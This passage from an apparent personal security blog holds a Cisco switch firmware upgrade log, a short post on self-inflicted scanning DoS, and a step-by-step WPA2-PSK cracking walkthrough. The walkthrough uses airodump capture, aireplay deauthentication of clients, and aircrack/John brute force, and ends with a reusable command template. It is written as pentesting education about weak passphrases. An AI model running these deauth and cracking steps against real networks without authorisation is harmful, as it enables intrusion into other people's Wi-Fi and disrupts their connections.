extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_side_gray.gif (217 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/cna_download_splash.gif (44862 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fan_animation.gif (4023 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gbic_rzr_gray.gif (132 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/question.gif (405 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/bar_green.gif (1415 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/122367.gif (11207 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedAccess.gif (1066 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/help.gif (563 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/131075.gif (1223 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/black.gif (35 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sitewide_print_off.gif (905 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/update.gif (596 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/tab_right_active.gif (862 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/dkgreenmask28_upright.gif (149 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/help_on.gif (1734 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/down_arrow.gif (837 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/cna_icon3.gif (1196 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/linkup_bead.gif (321 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/tab_right_inactive.gif (922 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/tab_left_inactive.gif (919 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sideinverse_gray.gif (133 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/ip_fig3.gif (9178 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fpanel.gif (6389 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/refresh_off.gif (1329 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/bar_lg2.gif (1385 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_sideinverse_gray.gif (215 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gig_base.gif (303 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spAccess.gif (1062 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedMultiple.gif (1096 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gray.gif (135 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spGuest.gif (1040 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/print_off.gif (1319 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/whitemask11_botleft.gif (62 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/legend.gif (167 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_forward.gif (906 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/icon_popup.gif (379 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/hb_gray.gif (115 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fx_gray.gif (121 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/tab_bg_active.gif (827 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fx_sidegray.gif (120 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/cwdm_led_gray.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/mdarrow.gif (101 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_sideinverse_empty_gray.gif (165 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_side_empty_gray.gif (165 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gbic_cwdm_gray.gif (184 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/refresh_on.gif (2041 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/cwdm_led_big_gray.gif (99 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/blinkred1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/141281.gif (3101 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/131080.gif (1182 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/up_arrow.gif (837 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/comboPressedArrow.gif (862 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/tab_left_active.gif (852 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedServer.gif (952 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/bar_yellow.gif (1145 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/upgrade.gif (1167 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/led_gray.gif (45 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/smartports_on.gif (1918 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_gray.gif (207 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/warning_big.gif (296 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/pixel.gif (49 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/menu_monitor.gif (1576 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedPrinter.gif (1072 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/c2970g_24_4.gif (5655 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/mleaf.gif (104 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/122366.gif (18471 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spServer.gif (937 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/cna_icon2.gif (1185 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_button_left.gif (298 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/tab_bg_inactive.gif (931 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_print.gif (1183 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedGuest.gif (1040 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/ip_fig2.gif (7003 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_swupgrade.gif (1194 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spNone.gif (881 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedRouter.gif (1135 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbarButtonDownLeft.gif (187 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sitewide_downleft.gif (53 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_legend.gif (992 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/temp_red.gif (3928 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/redgreen1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gb_sfp_empty_Vertical_gray.gif (217 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gauge_on_line.gif (827 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/c2970g_24_0.gif (5637 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPrinter.gif (1066 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/bullet.gif (0 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gbic_base.gif (160 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sitewide_text_start.gif (1060 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/bottom_left.gif (45 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_button_right.gif (295 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/menu_config.gif (1840 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/swupgrade_off.gif (1433 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/131079.gif (1187 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spRouter.gif (1130 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_button_tile.gif (160 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fan_down.gif (1861 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_help.gif (1077 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/logo.gif (1706 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gb_sfp_type1_gray.gif (269 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/print.gif (625 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_sideinverse_tx_gray.gif (152 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/desktop.gif (997 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_empty_gray.gif (155 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbarGradient3px.gif (519 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbarButtonDownTile.gif (157 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fwd_off.gif (1039 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gig_for_legend.gif (1301 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gbic_lx_gray.gif (252 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/141280.gif (3053 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/inv_gray.gif (133 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/swrefresh.gif (773 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedIPPhone.gif (1125 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sitewide_upleft.gif (52 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/refresh.gif (902 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/mrarrow.gif (104 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gb_sfp_type2_gray.gif (233 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gb_sfp_type1_Vertical_gray.gif (266 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gbic_empty.gif (187 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/side_gray.gif (131 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spIPPhone.gif (1120 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/warning.gif (1059 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/top_right.gif (45 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/blackgreen1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedDesktop.gif (982 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/cna_icon1.gif (1212 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/whitemask11_upright.gif (61 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/ip_fig1.gif (7769 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/grn_vertlines_bottom.gif (957 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gbic_t_gray.gif (229 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/admindown_bead.gif (922 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/swprogress.gif (12291 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fwd_on.gif (1742 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/normal.gif (1099 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/yellow.gif (139 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/back_off.gif (1012 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spDesktop.gif (984 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/legend_on.gif (1772 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_refresh.gif (1189 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/c2970_mode.gif (887 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gb_sfp_empty_gray.gif (196 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/92908.gif (3691 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/pngprogress.gif (5604 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/yellow_bead.gif (311 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/blinkgreen1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedNone.gif (892 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/131078.gif (1291 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/tb_bg.gif (1070 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbarGradient.gif (262 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spPressedSwitch.gif (1106 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sitewide_glossary_off.gif (914 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/swupgrade_on.gif (2335 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/back_on.gif (1681 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/131076.gif (317 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/cna_icon4.gif (1072 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/clear.gif (45 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/menu_tools.gif (1141 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/bottom_right.gif (45 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gauge_off_line.gif (827 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/smartports_off.gif (1440 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/meter_green.gif (59 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_smartports.gif (1237 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/nolink_bead.gif (325 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/info (360 bytes)
extracting info (107 bytes)

Installing (renaming): `flash:update/c2970-lanbasek9-mz.122-44.SE6′ ->
`flash:c2970-lanbasek9-mz.122-44.SE6′
New software image installed in flash:c2970-lanbasek9-mz.122-44.SE6

All software images installed.
Requested system reload skipped due to unsaved config changes.
Switch#
Switch#dir flash:
Directory of flash:/

2 -rwx 6928896 Jan 1 1970 01:11:59 +00:00 c2970-lanbasek9-mz.122-44.SE6.bin
3 -rwx 1421 Mar 1 1993 00:16:09 +00:00 config.text
4 -rwx 24 Mar 1 1993 00:16:09 +00:00 private-config.text
5 -rwx 1048 Mar 1 1993 00:16:09 +00:00 multiple-fs
7 drwx 192 Mar 1 1993 00:33:43 +00:00 c2970-lanbasek9-mz.122-44.SE6

15998976 bytes total (428032 bytes free)
Switch#
Switch#sh boot
BOOT path-list : flash:c2970-lanbasek9-mz.122-44.SE6/c2970-lanbasek9-mz.122-44.SE6.bin
Config file : flash:/config.text
Private Config file : flash:/private-config.text
Enable Break : no
Manual Boot : no
HELPER path-list :
Auto upgrade : yes
Auto upgrade path :
Switch#wr mem
Building configuration…
[OK]
Switch#reload
Proceed with reload? [confirm]

This looks a bit better – 316 files in 6 directories on the flash now

Base ethernet MAC Address: 00:11:5c:01:be:80
Xmodem file system is available.
The password-recovery mechanism is enabled.
Initializing Flash…
flashfs[0]: 312 files, 6 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 15998976
flashfs[0]: Bytes used: 15570944
flashfs[0]: Bytes available: 428032
flashfs[0]: flashfs fsck took 10 seconds.
…done Initializing Flash.
Boot Sector Filesystem (bs) installed, fsid: 3
done.
Loading “flash:c2970-lanbasek9-mz.122-44.SE6/c2970-lanbasek9-mz.122-44.SE6.bin”…@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
File “flash:c2970-lanbasek9-mz.122-44.SE6/c2970-lanbasek9-mz.122-44.SE6.bin” uncompressed and installed, entry point: 0×3000
executing…

Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software – Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

cisco Systems, Inc.
170 West Tasman Drive
San Jose, California 95134-1706

Cisco IOS Software, C2970 Software (C2970-LANBASEK9-M), Version 12.2(44)SE6, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Mon 09-Mar-09 18:27 by gereddy
Image text-base: 0×00003000, data-base: 0×01000000

Initializing flashfs…

flashfs[1]: 312 files, 6 directories
flashfs[1]: 0 orphaned files, 0 orphaned directories
flashfs[1]: Total bytes: 15998976
flashfs[1]: Bytes used: 15570944
flashfs[1]: Bytes available: 428032
flashfs[1]: flashfs fsck took 2 seconds.
flashfs[1]: Initialization complete….done Initializing flashfs.

POST: CPU MIC register Tests : Begin
POST: CPU MIC register Tests : End, Status Passed

POST: PortASIC Memory Tests : Begin
POST: PortASIC Memory Tests : End, Status Passed

POST: CPU MIC interface Loopback Tests : Begin
POST: CPU MIC interface Loopback Tests : End, Status Passed

POST: PortASIC RingLoopback Tests : Begin
POST: PortASIC RingLoopback Tests : End, Status Passed

POST: PortASIC CAM Subsystem Tests : Begin
POST: PortASIC CAM Subsystem Tests : End, Status Passed

POST: PortASIC Port Loopback Tests : Begin
POST: PortASIC Port Loopback Tests : End, Status Passed

Waiting for Port download…Complete

This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.

A summary of U.S. laws governing Cisco cryptographic products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by sending email to
export@cisco.com.

cisco WS-C2970G-24TS-E (PowerPC405) processor (revision D0) with 122880K/8184K bytes of memory.
Processor board ID CSG0823P0FS
Last reset from power-on
1 Virtual Ethernet interface
28 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.

512K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address : 00:11:5C:01:BE:80
Motherboard assembly number : 73-9095-04
Power supply part number : 341-0045-01
Motherboard serial number : CAT08220HSS
Power supply serial number : LIT0818014P
Model revision number : D0
Motherboard revision number : A0
Model number : WS-C2970G-24TS-E
System serial number : CSG0823P0FS
Top Assembly Part Number : 800-24261-01
Top Assembly Revision Number : E0
Hardware Board Revision Number : 0×02

Switch Ports Model SW Version SW Image
—— —– —– ———- ———-
* 1 28 WS-C2970G-24TS-E 12.2(44)SE6 C2970-LANBASEK9-M

Press RETURN to get started!

So – now we have the image & http software loaded

Switch#sh run | i http
ip http server
ip http secure-server
Switch#

And we now have a fully operational switch, with Cisco Device Manager software running.

Next steps – config the switch, its all yours.

Comments : Leave a Comment »
Tags: cisco catalyst
Categories : cisco

WPA2 network cracking

27 09 2011

So – everyone has cracked WEP & everyone knows it has a couple of seconds security around it.

This time I am getting connected to a WPA2 / PSK protected network.

Couple of things you will need

Backtrack (I am using 5r1 )
A wordlist – google is your friend here but there is a 3169 word list at /pentest/passwords/john/password.lst to get you started
A wireless card
A WPA or WPA2 network protected with a pre-shared key (your own of course)

==Drop the interface into monitor mode==

root@bt:~# airmon-ng start wlan0

Interface    Chipset        Driver

wlan0        Zydas zd1211    zd1211rw - [phy1]
(monitor mode enabled on mon0)

==Find your target wireless network==

root@bt:~# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 38:E7:D8:AD:B2:0E    0       61        0    0  11  54e  WPA2 CCMP   PSK  Wireless

==Start capturing==

root@bt:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

 CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                           

 38:E7:D8:AD:B2:0E    0 100     4319       83    0  11  54e  WPA2 CCMP   PSK  Wireless                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                    

 38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0    1 -48      0       81  Wireless

So now that you are capturing the traffic, we can either wait for a user to connect, or deauth an existing one....

==Deauth an existing user to get the 4 way handshake==

root@bt:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49  Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50  Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@bt:~#

Once the user is connected, you see the WPA handshake in the top right corner

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E    0  96      807       28    0  11  54e  WPA2 CCMP   PSK  Wireless

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0   54 - 6      0      161

Now, the best bit of this over WEP cracking is that we no longer need to be anywhere near the network. The cracking is done offline.

==The easy way (No garuntee this will work)==

There are two ways to tackle this - at the end of the day, you need to brute force the password, but having a decent wordlist gives you a huge advantage over a,b,c,d 1,2,3,4 etc.

This is the secret sauce - without a decent wordlist, you got nothing.

For this example we will just use the one that comes with JTR in BT

root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:00] 48 keys tested (489.60 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@bt:~#

BOOHYA – our WPA2 PSK is sunshine

==The hard way (but will EVENTUALLY find it)==

root@bt:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:22] 11484 keys tested (534.50 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@bt:~#

So thats it … no smoke … no mirrors … Get the capture of a handshake, then brute force the key from it

Remember this the next time you are thinking of a PSK for your wireless router.

A good page to read about password strength & get a feel for what it takes to brute force different passwords is the Password Haystacks page by Steve Gibson (grc.com)

 root@bt:~# airmon-ng start [WLAN INTERFACE (usually wlan0)]

 root@bt:~# airodump-ng [MON INTERFACE (usually mon0)]

 root@bt:~# airodump-ng mon0 --channel [WLAN CHANNEL] --bssid [BSSID MAC] -w /tmp/[CAPFILE]

 root@bt:~# aireplay-ng -0 1 -a [BSSID MAC] -c [CLIENT MAC] mon0

 root@bt:~# aircrack-ng -w [WORDLIST] -b [BSSID MAC] /tmp/[CAPFILE]

 root@bt:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b [BSSID] -w - /tmp/[CAPFILE]

Comments : Leave a Comment »
Tags: aircrack, airmon, airodump, attack, passwords, tools, wireless, wpa2
Categories : backtrack, penetration testing, security

When SIEM goes bad …

5 09 2011

Thats not an entirely true heading – it really was my fault …

A reminder to ensure you correctly scope your nmap / vuln scanning before you kick it off. I kicked off a network / vulnerability scan from OSSIM on my internal network – with a “slightly larger than I should have” scope and DOS’d myself ….. DOH !

Comments : Leave a Comment »
Tags: astaro, dos, nmap, ossim
Categories : firewall, penetration testing

Disable Windows 7 IPv6 random temporary addresses

4 08 2011

One of the added security features with IPv6 addressing is “Temporary address interface identifiers”

https://isc.sans.edu/diary.html?storyid=10966

